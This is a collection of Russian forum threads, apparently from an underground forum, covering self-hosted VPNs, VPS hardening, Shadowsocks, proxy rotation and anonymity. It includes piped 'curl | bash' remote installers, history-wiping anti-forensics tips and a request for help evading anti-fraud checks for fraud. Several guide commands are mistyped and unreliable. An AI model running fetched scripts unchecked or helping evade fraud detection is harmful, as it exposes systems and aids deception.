1. Вы и только вы будете им пользоваться. Используя VPN подписки вы часто будете сталкиваться с тем, что Вас будет постоянно преследовать каптча и будут блокировки связанные с тем, что слишком много пользователей сидит с таким же ip адресом, что и у вас, так как сервера, которые вы используете у арендованного VPN провайдера используют 1000-чи других пользователей и вполне вероятно, что не для самых законных целей, например мошенничество или ддос. Используя Собственный ВПН сервер, никто кроме вас не будет им пользоваться.

2. Никаких неожиданных блокировок. Например в странах СНГ пошла нездоровая практика блокировки пулов ip адресов серверов ВПН провайдеров. Т.е. вы могли оплатить себе подписку на допустим НОРДВПН, а например в России и Казахстане пул его ip адресов находиться в блоке, т.е. вы просто на просто не сможете подключиться к этим серверам и соответственно воспользоваться вашей подпиской.

Первое с чего стоит начать, - выбор хостинг провайдера для аренды VPS.

Если одна из целей создание VPNанонимность, помним про анонимную оплату сервера и анонимное подключение на сервер для настройки. Т.е. оплату делаем через криптовалюту, а настройку например через сеть TOR, если увижу комментарии, что Вам это интересно, сделаю соответствующее видео.

Для поиска хостинг провайдера можно воспользоваться сервисом poiskvps.ru

Нам для сервера много не нужно, 1 ГБ ОЗУ, 1 ядро процессора, этого будет достаточно. Т.к. мы хотим обойти местные блокировки то соответственно лучше выбирать иностранное расположение сервера, а еще лучше иностранного хостинг провайдера, достаточно верно такие можно определить по отсутствию русского языка на сайте, но мы создаем сервер не для какой-то незаконной деятельности, поэтому нам это не так важно.

Для загрузки PUTTY https://the.earth.li/~sgtatham/putty/latest/w64/putty-64bit-installer.msi

sudo apt-get update && sudo apt-get -y upgrade

apt-get install curl

curl -L https://install.pivpn.io | bash

pivpn add

pivpn -qr

Мое авторское видео, пишем вопросы и идеи к следующему видео.

Коротко о Shadowsocks

ID: 676533bbb4103b69df371987
Thread ID: 111269
Created: 2024-03-25T07:05:40+0000
Last Post: 2024-03-26T20:33:59+0000
Author: Center for Finance
Replies: 3 Views: 534

Коротко о Shadowsocks

Shadowsocks — это бесплатный сетевой протокол шифрования передачи данных, с открытым исходным кодом и развитый на базе технологии SOCKS5.

Известен тем, что используется для обхода «великого китайского файервола». Две недели назад СМИ писали, что РКН его заблокировал, но все работает как и работало.

Много раз упоминался мной вскользь, сегодня поговорим о том, как им пользоваться.

1. Для использования нам пригодится либо приложение Outline VPN, либо официальные GUI приложения для различных ОС.

2. Если не хотите ничего делать сами, можно найти сразу готовые конфиги. Например, с помощью Telegram V2Ray Collector или здесь.

3. Если хотите стабильное, но платное решение, можете использовать Onion VPN, где с недавних пор есть Shadowsocks серверы.

4. Если хотите поднять собственный сервер, да и еще настроенный по уму, то материалы для вас находятся ниже.

Для Android можно использовать NekoBox, который как раз обновился в этом месяце и представляет из себя внушительный агрегатор прокси.

К слову, популярные инструменты для обхода блокировок исчезли с Github в один день буквально на этой неделе. Речь более чем о 20 инструментах.

Читать дополнительно:
1.[ Как получить личный сервер Shadowsocks за 10 минут без затрат.](https://telegra.ph/Kak-poluchit-lichnyj-server-Shadowsocks- za-10-minut-bez-zatrat-09-25)
2. Обход блокировок: настройка сервера XRay для Shadowsocks-2022 и VLESS с XTLS-Vision, Websockets и фейковым веб- сайтом.
3. 3X-UI: Shadowsocks-2022 & XRay (XTLS) сервер с простой настройкой и приятным интерфейсом.

Бесплатный VPN сервер

ID: 676533bbb4103b69df371af8
Thread ID: 68276
Created: 2022-06-07T06:43:38+0000
Last Post: 2022-07-03T08:13:14+0000
Author: Antares
Replies: 20 Views: 527

У Нас открылся Бесплатный VPN сервер. Данные для входа:

Free VPN
Сервер: dchub.one
Логин: vpn
Пароль: vpn
Ключ: +Trd78hd84YDa90-
L2TP+IPSec

https://vk.com/dchub.club

Первоначальное администрирование и защита VPS (Для самых маленьких)

ID: 676533bbb4103b69df3719ad
Thread ID: 103581
Created: 2023-12-05T22:11:29+0000
Last Post: 2024-02-07T16:21:13+0000
Author: Hanzo
Replies: 2 Views: 527

Первичная настройка VPS

Перед поднятием непосредственно различных сервисов, было бы неплохо произвести хоть какую то первичную настройку на сервере: обновить пакеты/поставить нужные пакеты, отключить ненужные сервисы, создать пользователя, настроить sshd_config (поменять порт, запретить коннет от root) и ещё много всего.
Но обо всём по порядку...
Поскольку я показываю на примере дистрибутива Debian, вводимые команды будут только для этого дистибутива и для дистрибутивов основанных на Debian (Ubuntu)!
Итак, приступим.
Обновляем пакеты:

apt-get update && apt-get upgrade

Выскочит уведомление, в котором нужно утвердительно ответить Yes

Если не хотите постоянно нажимать y при обновлении, то вводите эту команду:

apt-get update && apt-get upgrade -y

После завершения обновляния установим, так сказать, пакеты первой необходимости.

Пришло время погрузиться в обычные будни системного администратора Linux:

apt-get install net-tools cron wget curl nano mc htop python
python-pip git ufw sudo git tcptrack vnstat screen

Обычно многие из данных пакетов установлены в системе изначально, но не всегда. Далее выпадет возможность поработать с каждым из них и каждый будет рассмотрен.Еще можно поставить следующие пакеты, но не обязательно (они предназначены для сборки
пакетов из open source code, а по простому - из открытого исходного кода):

apt-get install build-essential make automake autoconf pkg-config

Настроим языковые локали в системе:

dpkg-reconfigure locales

выбираем только:

en_US.UTF-8 UTF-8

Для этого вводим номер 146 и для выбора осуществляем нажатие на клавишу Enter. Затем вводим номер 3 и снова нажимаем на клавишу Enter. Это применит изменения.

Произведём конфигурация часовых поясов:

dpkg-reconfigure tzdata

Выбираем исключительно (это номера 13 и 33 соответственно):

None of the above->UTC

ОБЯЗАТЕЛЬНО поменяем пароль от суперпользователя root:

passwd root

Система предложит дважды ввести пароль. При его вводе символы на экране не будут отображаться. Так должно быть и это нормальная практика в Linux. Помогает защитить пароль от посторонних.

Далее, нам нужно ОБЯЗАТЕЛЬНО создать пользователя следующей командой:

useradd -m -s /bin/bash Hanzo

где:
useradd - команда, создающая пользователя

-m - создаёт домашнюю папку пользователя в /home/<имя пользователя>/ и по-умолчанию
имеет такое же название, как и имя пользователя

-s - указывает, какой shell, то есть оболочку командной строки, использовать

Hanzo - имя пользователя (это для примера и вы естественно выбираете своё)

После создания пользователя, вам ОБЯЗАТЕЛЬНО нужно создать ему пароль. Потому что
мы будем использовать именно этого юзера для соединения по ssh:

passwd LOL

Система, так же как и для суперпользователя root, предложит дважды ввести пароль. При этом символы на экране так же не будут отображаться.

Далее, нужно посмотреть какие сервисы запущены и отключить их (потому что, как правило, они светят наружу ненужными портами, как новогодняя ёлка и создают брешь в защите):

netstat -tulpn

На данном этапе в идеале должен быть запущен только сервис sshd. Поскольку у меня установлена Debian-minimal, то так и есть.

Команда netstat -tulpn выдаёт только:

Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State
PID/Program name
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN
204/sshd
tcp6 0 0 :::22 :::* LISTEN
204/SSH

Но обычно может быть запущен какой-нибудь веб-сервер, mail-server, еще что либо... Не знаю, что запущено у вас, поэтому поочерёдно вводите следующие команды:

/etc/init.d/apache2 stop
update-rc.d apache2 disable
/etc/init.d/postfix stop
update-rc.d postfix disable
/etc/init.d/nginx stop
update-rc.d nginx disable
/etc/init.d/exim4 stop
update-rc.d exim4 disable
/etc/init.d/rpcbind stop
update-rc.d rpcbind disable
/etc/init.d/nfs-common stop
update-rc.d nfs-common disable
/etc/init.d/rsyslog stop
update-rc.d rsyslog disable

Это должно отключить то, что обычно запущено уже при создании сервера.

Убедитесь что
никаких левых сервисов не запущено. Такие, как например ntpd, avahi-daemon, dhcpcd,
exim4-base, exim4-config, mutt, procmail.

Совершенно не нужны они на сервере, поэтому всё
лишнее удаляем через:

apt-get purge имя_пакета

либо через:

apt-get autoremove имя_пакета

Теперь нужно настроить sshd. Из соображений безопасности поменяем порт со стандартного
на нестандартный и запретим подключение от суперпользователя root.

Редактируем файл /etc/ssh/sshd_config при помощи текстового редактора nano:

nano /etc/ssh/sshd_config

Вкратце расскажу основные горячие клавиши при работе с консольным редактором nano:

nano <путь до файла> - открываем файл в nano

Ctrl+O - сохранить и записать изменения в файл. Нажимаем Ctrl+O, потом Enter

Ctrl+X - выйти из nano

Ctrl+K - вырезать целую строку. Она будет скопирована в буфер обмена

Ctrl+U - вставить вырезанную строку, которая находится в буфере обмена

Ctrl+W - поиск по файлу. Поиск в редакторе, вводим что нужно -> нажимаем Enter

Если хотим скопировать часть текста, то в самом редакторе выделяем мышкой нужный
текст и нажимаем клавиатурную комбинацию Ctrl+Shift+C

Для того того чтобы вставить текст, который сейчас находится в буфере обмена,
нажимаем комбинацию Ctrl+Shift+V

Не забывайте вводить sudo nano если редактируете файл, к которому у вас нет прав на
запись. То есть если работаете от пользователя, а не от суперпользователя root.

Но не будем уходить далеко от темы. В файле /etc/ssh/sshd_config ищем строку Port (будет
где-то наверху), и меняем ее значение на другое, отличное от стандартного 22, в диапазоне от
1024 до 64000.
Так же, если строка закомментирована, то есть вначале стоит символ #, то
убираем его. Должно получиться примерно как в данном случае:

Port 2282

Ищем строку PermitRootLogin и меняем её значение с without-password или yes на no
Так же, если строка закомментирована, то есть вначале стоит символ #, то убираем и его:

PermitRootLogin no

Внимательно проверяем, запоминаем порт, сохраняем и закрываем документ.
Важно все сделать нормально. Потому что если вы где то допустите ошибку в этом
файле, например напишите один порт, а потом его забудете, или запретите логин от root,
а другого пользователя у вас нет, то вы просто не сможете подключиться к серверу.
Обычно данная проблема решается в личном кабинете, там можно соединиться по SSH (вот
где пригодится пункт в меню - получить гостевой доступ по SSH в случае аварии

Console), далее залогиниться под root и изменить в файле всё что нужно. В крайнем случае
выполните переустановку ОС.
После всех манипуляций в файле /etc/ssh/sshd_config, перезапускаем службу sshd:

service sshd restart

или если не работает, то:

systemctl restart SSH

Добавим службу sshd в автозагрузку (она у нас уже добавлена, но на всякий случай покажу):

update-rc.d sshd enable

Изменения применятся. Разница в командах зависит лишь от установленных в ОС демонах (в
Linux так называются службы автозапуска, если обьяснить проще) и не более того.

Настроим SSH для постоянной работы. Создадим новые ключи и сменим их с дефолтных по умолчанию.
Для безопасности, да и просто, чтобы не занимали лишнее место на сервере:

update-rc.d -f ssh remove

update-rc.d -f ssh defaults

cd /etc/ssh/

dpkg-reconfigure openssh-server

Следующее ваше соединение по SSH будет выглядеть следующим образом:

ssh Hanzo@ip -p 2282

где:
Hanzo - пользователь, отличный от root. Под рутом не получится подключиться
ip - IP адрес VPS
-p 2282 - порт SSH, который вы указывали в /etc/ssh/sshd_config
Теперь вы будете соединяться по SSH на сервер через вашего пользователя. У него нет почти
никаких прав, он даже не суперпользователь. Поэтому, для того чтобы производить какие-то
дальнейшие манипуляции на сервера, требующие повышенных привилегий (обычная политика безопасности Linux в действии), нужно залогиниться под рутом.
Для этого под обычным пользователем вводим следующую незамысловатую команду:
su -

Далее вводим пароль от суперпользователя root. Все - можете дальше делать на сервере что
хотите. Чтобы выйти из-под рута, вводите:

exit

Эта же команда служит для отключения обычного пользователя от сервера.
Для перезагрузки сервера вводим команду:

reboot

Для выключения сервера вводите команду (но учтите, что сам он не включится и прийдется
делать это вручную в личном кабинете на сайте хостера):

shutdown -h now

Давайте на следующем этапе отключим соединение по протоколу ipv6
Если эта дрянь поставляется с сервером автоматом - отрубайте! У этого хостера точно
поставляется.
Проверяем:

ifconfig a

В нашем случае смотрим на активный сетевой интерфейс (eth0 либо venet0) и если есть ipv6,
то редактируем файл /etc/sysctl.conf в текстовом редакторе nano:

nano /etc/sysctl.conf

Дописываем в конце следующие строки:

disable IPv6

net.ipv6.conf.all.disable_ipv6 = 1
net.ipv6.conf.default.disable_ipv6 = 1
net.ipv6.conf.lo.disable_ipv6 = 1

Сохраните и закройте файл. Затем используйте опцию -p для перезагрузки конфигурации файла /etc/sysctl.conf:
sysctl IP

Вывод должен быть:

net.ipv6.conf.all.disable_ipv6 = 1
net.ipv6.conf.default.disable_ipv6 = 1
net.ipv6.conf.lo.disable_ipv6 = 1

Проверяем:

ifconfig a

Теперь ipv6 должно исчезнуть навсегда, унеся в небытие деанон нашего сервера.

Так же сменим следующие параметры:
Имя хоста. На что нибудь иное. Ваш сервер так будет идентифицироваться в сети.
Я для примера выбрал whoami, но вы выбирайте своё. Для примера, что то типа
srv327543
nano /etc/hosts

Если отказывается меняться имя хоста из терминала, а такое бывает - делайте это в личном
кабинете на сайте хостера, предоставляющего VPS.
Motd (Message of the Day - сообщение дня)

nano /etc/more

Можно сгенерировать, скопировать и уставить надпись, чтобы каждый вход на
VPS посредством SSH в терминале радовал вас.
Редактируем в текстовом редакторе nano:

nano /etc/issue.net

Issue.net и Motd не должны содержать подробную информацию о пользователе или сессии!

Давайте создадим скрипт. Это такие мини-программы, написанные на bash.
Скрипт призван упростить обновление системы и создаётся уже на сервере:
nano /bin/update

Заполняем его содержимым и сохраняем:

#!/bin/sh
apt-get update && apt-get upgrade -y

Делаем данный скрипт исполняемым:

chmod +x /bin/update

Теперь введя в терминале просто

update

мы избавим себя от ввода длинных команд для обновления системы.
Но это для ленивцев.

Проверьте, кто уже пытался войти в вашу систему:

cat /var/log/auth.log | grep 'sshd.*Invalid'

Не хорошо, правда?

Злые хакеры пытаются атаковать ваш VPS. Через несколько минут в сети
VPS, боты пытаясь сканировать открытые порты и атаковать их, используют атаку типа
bruteforce или по словарю.
Пусть стараются лучше.
Но всё же стоит настроить файервол.

Внимание! Есть смысл сразу же разрешить входящий и исходящий трафик для SSH,
иначе при включении фаервола можно потерять коннект к машине:

sudo ufw allow 22

вместо 22 необходимо вставить ваш порт SSH, например 2282
Включаем ufw (sudo опустим, так как все команды будем выполнять от root):

ufw enable

Выключается он аналогично:

ufw disable

Просмотреть существующие правила можно выполнив:

ufw status numbered

Все что (v6) в этом списке можете смело удалять!

ufw delete НОМЕР_СТРОКИ

В нашем случае это будет строка 2. Проверяем вывод:

ufw status

Результат:
Status: active
To Action From
-- ------ ----
2282 ALLOW Anywhere

Позже мы научимся модифицировать прафила файервола для разных сервисов, но это в
процессе.
Почему не iptables а ufw, спросит кто то?
UFW - межсетевой экран (Firewall) для Linux, который является надстройкой над iptables.
В отличии от iptables является более интуитивно понятным, т.к. по сути все правила к нему пишутся на английском языке. UFW полностью совместим с iptables и его можно совмещать с ним при необходимости.
UFW не является полноценной заменой iptables, очень сложные правила на нём не напишешь, но необходимый минимумом, который обычно
требуется простому пользователю, он имеет.

ЭТО ПРОСТО ДЛЯ ПРИМЕРА И ВЫПОЛНЯТЬ НЕ ОБЯЗАТЕЛЬНО!

Введя параметры по умолчанию для входящего трафика, заблокируйте все:

sudo ufw default deny incoming

Для исходящего трафика, разрешение на все:

sudo ufw default allow outgoing

Включение защиты от открытия всех возможных портов:

sudo nano /etc/ufw/before.rules

После строк:

Don't delete these required lines, otherwise there will be

errors
*filter
:ufw-before-input - [0:0]
:ufw-before-output - [0:0]
:ufw-before-forward - [0:0]
:ufw-not-local - [0:0]

End required lines

добавьте:

Limit to 10 concurrent connections on port 80 per IP

-A ufw-before-input -p tcp --syn --dport 80 -m connlimit --
connlimit-above 10 -j DROP
и:

Limit to 20 connections on port 80 per 2 seconds per IP

-A ufw-before-input -p tcp --dport 80 -i eth0 -m state --state NEW
-m recent --set
-A ufw-before-input -p tcp --dport 80 -i eth0 -m state --state NEW
-m recent --update --seconds 2 --hitcount
20 -j DROP

По моему достаточно.
Давайте лучше настроим генератор шума на сервере.
Это делается затем чтобы забить канал информационным мусором и отбить у самозванцев желание прослушивать трафик.
Ваш поднятый на сервере VPN будет с ним как капля в море. Но имеет смысл проворачивать такое лишь на сервере с безлимитным трафиком.
В нашем случае наш сервер таким и является. Но встречается в природе к сожалению и обратное.
pip install requests

git clone https://github.com/1tayH/noisy.git

cd noisy

python noisy.py --config config.json

Всё, генератор работает!
В файле config.json можете посмотреть сайты куда он ходит. Можете изменить на свои при должном желании. Это дело пары минут.

Можно запустить tcptrack,
подключившись к серверу со второго терминала (да, так тоже можно!), посмотреть что скрипт отрабатывает как нужно и убедиться в этом воочию, увидев множественные подключения с разных IP адресов:
tcptrack -i venet0

где venet0 - мой сетевой интерфейс.
Свой смотрите на сервере через
ifconfig -i

Можете так же посмотреть запущенные на сервере процессы через утилиту htop
Это очень удобная утилита для контроля за сервером, можно выключать ненужные процессы, следить за нагрузкой. И ещё очень много всего можно с ней сделать полезного.
Не очень удобно держать кучу окон открытыми, да и если выйти, то генератор перестанет работать. Но есть решение, которое исправит ситуацию.

Редактируем cron, который выполнит задание по расписанию и даже после перезагрузки:
crontab -e

В cron добавляем чтобы, в случае переполнения RAM, раз в сутки сервер перезагружался и собственно наш скрипт с генератором шума:

0 0 * * * /sbin/reboot
Reboot cd /root/noisy/ && python noisy.py --config config.json

После config.json не забывайте оставить пустую строку чтобы cron работал!
Просто нажмите Enter один раз.
Сохраняйте всё как в nano делали до этого. Теперь выполните команду
reboot для перезагрузки и применения изменений. Заходите на сервер - всё уже работает!

Каждый новичок в Linux, задаётся вопросом - как улучшить работу с удаленными серверами, а именно - как исключить некорректное завершение запущенной команды при обрыве
соединения или закрытии SSH клиента?

Консольная утилита screen очень удобна для решения всевозможных задач в консоли на удаленных серверах. Работая в сессии screen на удаленном сервере, можно запускать различные утилиты, отсоединяться от сессии screen и отключаться от удаленных серверов,
при этом утилиты будут продолжать работать.

Например, зайдя в сессию screen и запустив обновление системы, можно отсоединиться от сессии и сервера, а процесс при этом не прервётся. Чтобы зайти в screen, запускаем его на удаленном сервере командой:
screen

Далее можно запускать любые консольные утилиты, например, копирование файлов.

Отсоединение от сессии screen (deattach) осуществляется сочетанием клавиш Ctrl+a+d

После чего появится сообщение
[detached]

Далее вы можете уже выходить с удаленного хоста, или запускать новые сессии screen.

Просмотр сессий screen:

screen -ls

Присоединение (reattach) к сессии screen:

screen -r ваша_сессия

После чего вы попадаете в оставленную сессию screen, где продолжаются выполнятся запущенные вами утилиты.
«Умершие» сессии утилиты screen можно убрать командой:

screen -wipe

Это лишь необходимый минимум возможных ключей и команд утилиты screen, достаточный для начала работы с ней.
Более подробно об этой утилите смотрите help и man:
screen —help

man screen

Запомните! В Linux почти 90% информации по работе с той или иной программой можно легко узнать, используя подсказки в утилитах help и man.
Это подсказка вам на будущее.
Можно легко и наглядно мониторить сетевой трафик на сервере с помощью следующей утилиты.

vnStat - это сетевой монитор трафика с открытым исходным кодом и лицензией
GPL на базе консоли. Он легковесен и может использоваться без привилегий root. Статистика трафика хранится в базе данных и предоставляется по сетевым интерфейсам. Каждый интерфейс имеет свою собственную базу данных.
Демон vnstatd будет автоматически запущен после его установки. И он автоматически запускается при загрузке Debian/Ubuntu.
Вы можете проверить это с помощью systemctl:
systemctl status vnstat

"Enabled" означает автоматический запуск при загрузке системы.
После установки vnStat в
Debian/Ubuntu, база данных будет автоматически инициализирована для каждого сетевого
интерфейса. /var/lib/vnstat - это каталог базы данных для vnStat.

Новая база данных может быть создана с помощью следующей команды. Замените eth0 на
интерфейс, который необходимо контролировать.
На этом сервере он будет venet0:

vnstat --create -i eth0

Чтобы удалить базу данных для интерфейса, выполните следующую команду.
Замените eth0 интерфейсом, который вы больше не хотите контролировать.
vnstat --delete -i eth0

Чтобы просмотреть сетевой трафик в реальном времени, выполните эту команду:

vnstat -i eth0 -l

Префикс -i указывает на интерфейс (замените eth0 на свой интерфейс), l- говорит о включении live режима контроля в реальном времени. Нажмите Ctrl+C, чтобы выйти.
Так же можете заменить префикс -l в конце на следующие:
-h - за последние 24 часа
-d - за последние 30 дней
-m - за последние 7 дней
-w - за месяц*
-t - за последние 10 дней
Открою страшный секрет. Я не стал вам рассказывать об этом инструменте вначале.
Просто не хотел чтобы вы слишком ленились и учились вбивать в терминал всё руками. Это хорошее качество и когда нибудь сыграет вам на руку. Поверьте.
Может помните из винды, были там раньше файловые менеджеры Norton Commander или Far. Так это то же самое, только под Linux. Называется Midnight Commander. Или если по простому то просто mc.
Работа в нём проста и интуитивно понятна. Это двухпанельный менеджер и переключение
осуществляется нажатием на Tab. У него богатый функционал, кроме обычных операций с папками и файлами, можно ещё назначать права, передавать файлы на сервер и многое многое другое.
Не помешало бы отключить историю хранения набора в терминале.
Сделать это можно в скрытом файле /root/.bashrc для суперпользователя root.
Для обычного пользователя в его
домашней папке в таком же скрытом файле соответственно. Достаточно добавить строки:

export HISTFILE=''
export HISTSIZE=0

Ну и не забудьте почистить от уже накопившейся истории файлы

/root/.bash_history

для суперпользователя root. Для обычного пользователя соответственно очищаем такой же скрытый файл в его домашней папке.
В нашем случае это

/home/codeby/.bash_history
Ну и напоследок в завершении добавим пользователя Hanzo к группе sudo, чтобы он имел хоть какие то права:
usermod -g sudo Hanzo

Редактируем файл sudo:

visudo

Находим строки со следующим содержимым:

User privilege specification

root ALL=(ALL:ALL) ALL

Добавляем ниже следующие строки:

Allow members of group sudo to execute any command

Hanzo ALL=(ALL:ALL) ALL

Теперь перезагружаемся командой reboot и при входе на сервер видим, что истории в терминале больше нет (ничего не листается клавишами ВВЕРХ и ВНИЗ на клавиатуре).
Так же в суперпользователя root мы теперь можем перейти не только по команде

su -

Но и по следующей команде:

sudo I

Так же теперь простой выход с сервера осуществляется для суперпользователя root и
обычного пользователя (в нашем случае hanzo) по следующей команде:

exit

На такой славной ноте предлагаю завершить. Вам много предстоит
изучить и настроить. Но у вас обязательно всё получится при должной внимательности.

user agent

ID: 676533bbb4103b69df371c12
Thread ID: 50209
Created: 2021-04-02T17:36:14+0000
Last Post: 2021-04-03T09:37:53+0000
Author: Jim0x
Replies: 7 Views: 524

Приветствую, вот хочу поинтересоватся у умельцев, а так же что бы вы поделились со мной, как вы правильно поняли тема идет об user agent, самое что интересное, вот допустим юзер агент в браузере, его без проблем можно поменять, ладно это допустимо, а вот что насчет системного user agent'a того же passive os fingerprint, много инфы искал по поводу возможно ли сменить, а так же обмнауть всячиские сканнеры p0f, так вот слышал а точнее видел некоторые моменты, были посты на всяческих форумах, что типа были умники а может и есть которые меняли функции p0f через тот же systemctl, я конечно с трудом в это верю, так как проверял можно или нет таким образом поменять искал значения mss, но короче показывает мне большой палец система и говорит живи дальше со своей os, не надо мне говорить что поменяй ос, или настрой сокс это все понятно, но мне интересна сама процедура смены, или возможно это вообще и все, и так далее, если есть строки в системе где то определяющее твою ос, а так же сканнеры которые без проблем считывают эту инфу, то их наверное и можно как то поменять? напомню тема идет об Fingerpint сокращенно p0f!

Умельцы подделывать всего всяческого рода всякое, подскажите какой конфиг в системе можно подправить так что бы назойлевые сканнеры отстали и думали что я допустим зашел с другой ос!

Свое облачное хранилище

ID: 676533bbb4103b69df371a96
Thread ID: 75536
Created: 2022-11-09T09:54:46+0000
Last Post: 2022-11-14T18:39:59+0000
Author: Hanzo
Replies: 4 Views: 523

![cloud_storage.jpg](/proxy.php?image=https%3A%2F%2Fcodeby.net%2Fattachments%2Fcloud_storage- jpg.63790%2F&hash=9a45d56289b2d0d38854a36cb15b0a61)
Приветствую!
Не так давно мне понадобилось свое облачное хранилище. На XSS я, к сожалению, решения не нашел, так что решил поделиться тем, что получилось у меня.

В этой статье речь пойдет о поднятии своего облака. По сути, все, что нам нужно - это программа, которая будет шарить файлы, и производить над ними действия из веб интерфейса.

Мой выбор остановился на простенькой софтине Filebrowser. Filebrowser это - опенсурсный веб сервер с удобным веб интерфейсом и необходимым набором функционала, написанный на Go.

Установка крайне простая, в консоле пишем:

Code:Copy to clipboard

curl -fsSL https://raw.githubusercontent.com/filebrowser/get/master/get.sh | bash

Эта команда стягивает командный файл и сразу выполняет его, тем самым, самостоятельно устанавливая нужный нам софт.

Вот и все. Теперь осталось только запустить и посмотреть, что же получилось:

Code:Copy to clipboard

filebrowser -r drive -a 0.0.0.0

По умолчанию пароль admin::admin, но в настройках его легко можно поменять, так же есть большой выбор языков для интерфейса.

Еще, в настройках, можно добавить новых пользователей и разграничить им права и доступы. Или, дабы не заморачиваться созданием пользователей вручную - можно разрешить им регистрироваться в системе самостоятельно.

Как и в других облачных хранилищах, тут можно создавать папки, загружать файлы на диск и с него, редактировать, или просматривать файлы прямо в веб- интерфейсе.

Для администраторов так же доступно выполнение различных команд, как сами настроите, в общем - полный комплект удобств.

Добавить облако в автозагрузку тоже довольно просто.

Сначала надо создать файл с новым сервисом:

Code:Copy to clipboard

sudo nano /etc/systemd/system/filebrowser.service

И вставить в него следующее содержимое:

Code:Copy to clipboard

Bash: [Unit] Description=Filebrowser After=network-online.target [Service] User=kali Group=kali ExecStart=/usr/local/bin/filebrowser -r / [Install] WantedBy=multi-user.target

ExecStart нужно заменить на свою команду, которую вы используете для запуска, так же, помните что путь к домашней папке должен быть полный.

Теперь запускаем сервис

Code:Copy to clipboard

systemctl start filebrowser systemctl enable filebrowser

Вот пожалуй все ,чем я хотел поделиться, в этой статье. На самом деле, Filebrowser имеет больше возможностей, ознакомиться с ними можно на сайте создателей.

И, как обычно - спасибо всем, кто дочитал эту статью до конца.

Вопрос: VPN-TOR-VPN Whoix с флешки

ID: 676533bbb4103b69df371b03
Thread ID: 63159
Created: 2022-02-18T12:29:47+0000
Last Post: 2022-06-10T23:20:08+0000
Author: T3atral
Replies: 11 Views: 518

Можно ли настроить Whonix, запущенный с флешки без всяких виртуалок типа VBOX. И траф пустить через VPN-TOR-VPN?

Android для работы (обход антифрода)

ID: 676533bbb4103b69df37191e
Thread ID: 124483
Created: 2024-10-10T09:21:58+0000
Last Post: 2024-10-10T13:18:36+0000
Author: JerryManson
Replies: 1 Views: 517

Приветствую, интересуют следующие вопросы:

Undetectable подмена GPS на Android телефоне

Какие ключевые отпечатки обнаруживаются приложениями на Android

Каким образом быстро менять ключевые отпечатки, и какой телефон на какой версии Android подходит для данной задачи?

Нужно под личные задачи, приложения не банковские и тд, фрод в меру. Но на айфоне все лазейки перекрыты, поэтому рассматриваю замену.

Подскажите пожалуйста, лафы с неба не жду, сам включился в поиск, отблагодарю монетой если чей-то опыт действительно поможет

Качественная ли защита?

ID: 676533bbb4103b69df371b6a
Thread ID: 60163
Created: 2021-12-16T23:30:30+0000
Last Post: 2021-12-28T04:17:50+0000
Author: MikiToto
Replies: 6 Views: 517

Хотел бы узнать мнение о такой цепочке : дедик на нем тор, сверху прокси, и на другом дедике свой впн с белым листом подключения под ип прокси? Добротный ли вариант?

Решение по ротации проксей, proxy rotation

ID: 676533bbb4103b69df37191f
Thread ID: 124137
Created: 2024-10-05T07:54:22+0000
Last Post: 2024-10-06T07:04:47+0000
Author: simplestop
Replies: 3 Views: 513

Привет всем, может кто сталкивался с задачей ротации прокси из списка, нашел решение, mubeng называется, всем хорош, поднимает прокси сервер на localhost и пересылает туда прокси из списка меняет проксю хоть на каждый запрос, но пока что поднимает сервер только на http протоколе, мне же требуется https или socks5, может знает кто софт или как это можно сделать поделитесь способом, благодарю

Скрыть устройство от wi-fi

ID: 676533bbb4103b69df3719ab
Thread ID: 107406
Created: 2024-02-03T18:06:06+0000
Last Post: 2024-02-09T17:59:18+0000
Author: Patrick
Replies: 16 Views: 512

Всем привет!

Формулировка скорее всего получится кривая, но надеюсь мысль мою поймете =)
Существует ли способ спрятать конкретное устрйоство от wi-fi окружения?
Пример: в помещении много девайсов которые подключены к одному роутеру по вай- фай, плюс вокруг еще множество чужих вай-фай роутеров, мобилок и прочего что завязано на вай-фай. Как сдлеать так что бы находясь в окружении всех этих сетей, взять конкретный девайс и спрятать его от сигналов? Т.е., что бы роутеры не видели его и сам девайс не сканировал сети вокруг.

Такое в принципе возможно?

Всем спасибо!
Особая благодарность если обьясните доступным языком)

Статьи по безопасности

ID: 676533bbb4103b69df371c30
Thread ID: 48658
Created: 2021-02-26T10:48:10+0000
Last Post: 2021-02-26T10:48:10+0000
Author: user908768
Replies: 0 Views: 510

Деанонимизация скрытых Тор-сервисов через анализ биткоин-транзакций (eng):

[ Deanonymizing Tor Hidden Service Users Thr - Unknown.pdf - AnonFiles

](https://anonfiles.com/b6X8O769qa/Deanonymizing_Tor_Hidden_Service_Users_Thr_- _Unknown_pdf)

anonfiles.com

Обзор анонимности в различных блокчайн-системах (english):

[ A survey on privacy protection in blockcha - Qi Feng.pdf - AnonFiles

](https://anonfiles.com/H4V7O86aqa/A_survey_on_privacy_protection_in_blockcha_- _Qi_Feng_pdf)

anonfiles.com

Криминалистической обзор ориентированных на анонимность крыптовалют (english):

[ Forensic analysis of privacy-oriented cryp - Wiebe Koerhuis.pdf -

AnonFiles ](https://anonfiles.com/t1W1Ob66qd/Forensic_analysis_of_privacy- oriented_cryp_-_Wiebe_Koerhuis_pdf)

anonfiles.com

Dero, будьте осторожны

ID: 676533bbb4103b69df371908
Thread ID: 126768
Created: 2024-11-12T21:56:36+0000
Last Post: 2024-11-12T22:30:28+0000
Author: jaskolka
Prefix: Статья
Replies: 1 Views: 507

Не хотелось бы вообще лишний раз упоминать Dero, однако сейчас СЕО Dero занялись агрессивной компанией продвижения этого мусора, как аналог XMR, поэтому просто пару строчек на всякий случай оставлю:

Начать стоит с того, что разработчики скрывают от пользователей факт деанона всего блокчейна, не платят обещанные деньги (50к$) за bug bounty, и еще приходят проповедовать свою Dero везде, где упоминается XMR.

Для тех кто не в курсе, фанаты Dero лезут из-за всех щелей и кричат о том что Monero (XMR) плохой, это хонипот, везде кричат про ключевые картинки (key image) и отслеживание TXO, при этом сами не до конца понимают что такое stealth-address, key-image и TXO, их переписки в твиттере с одним из разрабов XMR можно посмотреть в твиттере по ссылкам внизу, kayabaNerve — это один из разработчиков XMR, он же первый и обнаружил уязвимость о чем сообщил (пытался сообщить) разработчиком Dero, которые его игнорировали.

Фанатам Dero - почему вы забываете о следующем:

— что ВСЕ 99% ВСЕХ транзакций Dero сдеанонены;
— разработчики до сих пор вообще не сообщили об этом на своих медиа ресурсах;
— до сих пор ошибка не исправлена;
